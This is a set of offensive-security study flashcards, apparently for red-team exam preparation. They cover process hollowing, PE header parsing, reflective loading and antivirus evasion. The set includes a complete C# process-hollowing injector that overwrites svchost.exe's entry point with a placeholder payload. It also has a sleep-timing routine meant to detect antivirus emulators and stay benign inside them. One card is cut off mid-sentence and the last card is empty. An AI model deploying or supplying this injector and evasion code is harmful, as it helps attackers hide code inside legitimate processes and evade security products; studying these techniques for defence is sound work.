Red

Last updated 1:23 PM on 4/10/26
13 Terms

1

Which Win32 calls are required for Process Hollowing?

  1. CreateProcess with the CREATE_SUSPENDED flag (the host process is created with its primary thread suspended before it reaches the entry point)

  2. ZwQueryInformationProcess with the ProcessBasicInformation class (retrieve the PEB address of the new process)

  3. ReadProcessMemory (read the image base from the PEB, then "carve out" the PE header by reading 0x200 bytes from the base address and parse it to locate the entry point)

  4. WriteProcessMemory (overwrite the code at the entry point with the shellcode)

  5. ResumeThread (resume the suspended primary thread, which now starts executing the shellcode instead of the original code)

2

How do you find the image base address of a remote process from its PEB?

  1. Acquire the PEB address by calling ZwQueryInformationProcess with ProcessBasicInformation (PebBaseAddress in the returned PROCESS_BASIC_INFORMATION)

  2. Read the pointer stored at offset 0x10 from the PEB address with ReadProcessMemory; this is the ImageBaseAddress field (offset 0x10 in a 64-bit process, 0x08 in a 32-bit process)

3

How do you find the entry point (the start of the executable code) from the base address of a process?

  1. Read the 4-byte value at offset 0x3c from the base address: this is e_lfanew, the RVA of the PE header

  2. Add that offset to the base address to get the VMA of the PE header

  3. Read the 4-byte value at offset 0x28 from the PE header: this is AddressOfEntryPoint, an RVA

  4. Add that RVA to the base address (not to the PE header address) to get the VMA of the entry point

4

What does the ref keyword mean in C#? Why is it this way?

Pass by reference. C# is a type-safe language; it does not like to

5

What does out keyword mean in C#?

Indicates that the variable is going to be filled in by the function (the callee must assign it), hence there is no need to initialise it beforehand

6

What does the Zw or Nt prefix of a WinAPI function such as ZwQueryInformationProcess imply?

It is a native API function exported by ntdll.dll, one layer below the documented Win32 API (kernel32.dll and friends). These functions wrap the system call into the kernel directly and are largely undocumented, so calling one from C# means writing your own P/Invoke declaration. From user mode the Nt and Zw versions behave identically; the distinction only matters for callers inside the kernel.
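The full hollowing sequence above, written out as an added example in C# (this is not code from the original flashcards). It assumes a 64-bit host process, uses svchost.exe as an arbitrary host path, and a three-byte int3 placeholder instead of real shellcode. The P/Invoke declarations show the ref and out keywords in use: structures Windows reads and writes are passed with ref, values it fills in are passed with out.

```csharp
using System;
using System.Runtime.InteropServices;

class Hollow
{
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    struct STARTUPINFO
    {
        public uint cb; public IntPtr lpReserved, lpDesktop, lpTitle;
        public uint dwX, dwY, dwXSize, dwYSize, dwXCountChars, dwYCountChars, dwFillAttribute, dwFlags;
        public ushort wShowWindow, cbReserved2;
        public IntPtr lpReserved2, hStdInput, hStdOutput, hStdError;
    }

    [StructLayout(LayoutKind.Sequential)]
    struct PROCESS_INFORMATION { public IntPtr hProcess, hThread; public uint dwProcessId, dwThreadId; }

    // x64 layout of PROCESS_BASIC_INFORMATION; only PebBaseAddress is used here.
    [StructLayout(LayoutKind.Sequential)]
    struct PROCESS_BASIC_INFORMATION
    {
        public IntPtr ExitStatus, PebBaseAddress, AffinityMask, BasePriority, UniqueProcessId, InheritedFromUniqueProcessId;
    }

    const uint CREATE_SUSPENDED = 0x00000004;
    const int ProcessBasicInformation = 0;

    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    static extern bool CreateProcess(string lpApplicationName, string lpCommandLine,
        IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles,
        uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory,
        ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);

    // Native (ntdll) function: no official C# signature exists, so we declare our own.
    [DllImport("ntdll.dll")]
    static extern int ZwQueryInformationProcess(IntPtr hProcess, int processInformationClass,
        ref PROCESS_BASIC_INFORMATION processInformation, uint processInformationLength,
        out uint returnLength);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer,
        int nSize, out IntPtr lpNumberOfBytesRead);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer,
        int nSize, out IntPtr lpNumberOfBytesWritten);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern uint ResumeThread(IntPtr hThread);

    // Parse the carved-out header: e_lfanew lives at 0x3c of the DOS header and
    // AddressOfEntryPoint at 0x28 from the start of the PE header. Both are RVAs.
    static uint EntryPointRva(byte[] header)
    {
        uint e_lfanew = BitConverter.ToUInt32(header, 0x3c);
        if (e_lfanew + 0x2c > header.Length)
            throw new InvalidOperationException("PE header lies beyond the 0x200 bytes read");
        return BitConverter.ToUInt32(header, (int)e_lfanew + 0x28);
    }

    static void Main()
    {
        byte[] shellcode = { 0xcc, 0xcc, 0xcc };   // placeholder payload (int3 x3), assumption

        // 1. Create the host process suspended. The host path is an assumption.
        var si = new STARTUPINFO { cb = (uint)Marshal.SizeOf(typeof(STARTUPINFO)) };
        PROCESS_INFORMATION pi;
        if (!CreateProcess(null, @"C:\Windows\System32\svchost.exe", IntPtr.Zero, IntPtr.Zero,
                false, CREATE_SUSPENDED, IntPtr.Zero, null, ref si, out pi))
            throw new InvalidOperationException("CreateProcess failed: " + Marshal.GetLastWin32Error());

        // 2. Retrieve the PEB address through the native API.
        var pbi = new PROCESS_BASIC_INFORMATION();
        uint returned;
        int status = ZwQueryInformationProcess(pi.hProcess, ProcessBasicInformation, ref pbi,
            (uint)Marshal.SizeOf(typeof(PROCESS_BASIC_INFORMATION)), out returned);
        if (status != 0)
            throw new InvalidOperationException("ZwQueryInformationProcess NTSTATUS 0x" + status.ToString("x"));

        // 3a. ImageBaseAddress is the pointer at PEB+0x10 in a 64-bit process (PEB+0x08 on 32-bit).
        var ptrBuf = new byte[IntPtr.Size];
        IntPtr n;
        if (!ReadProcessMemory(pi.hProcess, pbi.PebBaseAddress + 0x10, ptrBuf, ptrBuf.Length, out n))
            throw new InvalidOperationException("ReadProcessMemory(PEB) failed");
        IntPtr imageBase = (IntPtr)BitConverter.ToInt64(ptrBuf, 0);

        // 3b. Carve out the first 0x200 bytes of the image and locate the entry point.
        var header = new byte[0x200];
        if (!ReadProcessMemory(pi.hProcess, imageBase, header, header.Length, out n))
            throw new InvalidOperationException("ReadProcessMemory(header) failed");
        IntPtr entryPoint = imageBase + (int)EntryPointRva(header);

        // 4. Overwrite the entry point. WriteProcessMemory handles the page protection change.
        if (!WriteProcessMemory(pi.hProcess, entryPoint, shellcode, shellcode.Length, out n))
            throw new InvalidOperationException("WriteProcessMemory failed");

        // 5. Resume the primary thread; it begins at the entry point, which now holds the payload.
        ResumeThread(pi.hThread);
    }
}
```

Note that the entry point RVA is added to the image base, not to the PE header address; mixing those up is the most common mistake when hand-parsing the header. The process must match the bitness of this code (a 64-bit hollowing binary against a 64-bit host) or the PEB offset and pointer size are wrong.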

7

Why does Process Injection use CreateRemoteThread while Process Hollowing uses ResumeThread?

In process hollowing the target is created suspended, so its primary thread already exists and is parked before the entry point; once the entry point has been overwritten, resuming that thread executes the shellcode. In process injection the target is already running and none of its existing threads will ever jump to the injected buffer, so a new thread has to be created (CreateRemoteThread) with the shellcode address as its start routine.

8

What does reflective loading/injection mean?

Injection of shellcode or loading of a DLL without calling the LoadLibrary API: the loading code does the Windows loader's work itself (mapping the headers and sections into memory, applying relocations, resolving imports), so the DLL can be loaded straight from a memory buffer rather than from a file on disk

9

Why is LoadLibrary “noisy” and not stealthy?

  1. It requires the DLL to exist as a file on disk, where it can be scanned

  2. The Windows loader registers the DLL in the loaded-module list of the process it is loaded into (the PEB loader data), so it shows up whenever the process's modules are enumerated by tooling or security products
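A quick check of the second point, added here as an example rather than code from the flashcards: load a DLL the normal way and watch it appear in the process's module list, which .NET reads from the same loader data that tools and security products enumerate. winhttp.dll is an assumed choice of a system DLL that a plain console application does not load on its own.

```csharp
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;

static class LoaderNoise
{
    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    static extern IntPtr LoadLibrary(string lpFileName);

    // True when a module with this file name is in the current process's loaded-module list.
    public static bool IsListed(string moduleName)
    {
        foreach (ProcessModule m in Process.GetCurrentProcess().Modules)
            if (string.Equals(m.ModuleName, moduleName, StringComparison.OrdinalIgnoreCase))
                return true;
        return false;
    }

    static void Main()
    {
        const string dll = "winhttp.dll";   // assumption: not loaded by a bare console app
        Console.WriteLine("before LoadLibrary: listed = " + IsListed(dll));

        if (LoadLibrary(dll) == IntPtr.Zero)
            throw new InvalidOperationException("LoadLibrary failed: " + Marshal.GetLastWin32Error());

        // The loader has now added the DLL to the PEB's module lists: expected "listed = True".
        Console.WriteLine("after LoadLibrary:  listed = " + IsListed(dll));
    }
}
```

A reflectively loaded DLL never goes through this path, which is exactly why it does not show up in the same enumeration.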

10

What are the three main detection modalities adopted by antivirus software?

  1. Signature based: hashes and byte sequences derived from manual reverse engineering of known samples

  2. Behavioural/heuristic: the sample is executed in a sandboxed emulator and its behaviour is inspected for malicious actions

  3. Cloud-based analysis / artificial intelligence models

11

Why is the shikata_ga_nai encoder easily detected by AV?

The decoder stub that unpacks the payload is essentially static (its instruction pattern cannot be changed), so even though the encoded body differs on every run, the stub itself is an easy target for signature detection

12

How does a heuristic engine in an AV react to a pause or sleep instruction? How can we bypass this check?

  • The emulator does not wait out the delay: it "fast forwards" through the sleep and resumes execution immediately

  • Bypass by recording the actual time before and after the sleep and comparing the elapsed time to the requested sleep interval

  • If the elapsed time is shorter than the interval, the sleep was skipped and we can conclude we are running in a simulation
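The timing check described above, as an added C# example (not code from the flashcards). It reads two independent clocks around the sleep so that an emulator has to fake both consistently; the 90% tolerance and the 10-second delay are assumptions chosen to absorb scheduler jitter while still exceeding a typical emulation time budget.

```csharp
using System;
using System.Threading;

static class SleepCheck
{
    // Sleep for the requested interval and verify that roughly that much wall-clock
    // time really passed. Returns false when the sleep was fast-forwarded.
    public static bool SleptForReal(int milliseconds, double tolerance = 0.9)
    {
        int tickBefore = Environment.TickCount;      // millisecond tick counter
        DateTime wallBefore = DateTime.UtcNow;       // system clock

        Thread.Sleep(milliseconds);

        // unchecked subtraction keeps this correct across the 32-bit tick wrap-around
        int tickElapsed = unchecked(Environment.TickCount - tickBefore);
        double wallElapsed = (DateTime.UtcNow - wallBefore).TotalMilliseconds;

        double minimum = milliseconds * tolerance;
        return tickElapsed >= minimum && wallElapsed >= minimum;
    }

    static void Main()
    {
        // Long enough that an emulator's time budget forces it to skip ahead (assumption).
        if (!SleptForReal(10000))
        {
            // Clocks disagree with the sleep counter: assume emulation and stay benign.
            return;
        }

        // Real host: continue with the rest of the program here.
    }
}
```

Because both clocks are read through normal API calls, an emulator that hooks them and advances them in step with the skipped sleep would still pass; that is the limit of this check, and why it is usually combined with other sandbox indicators.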

13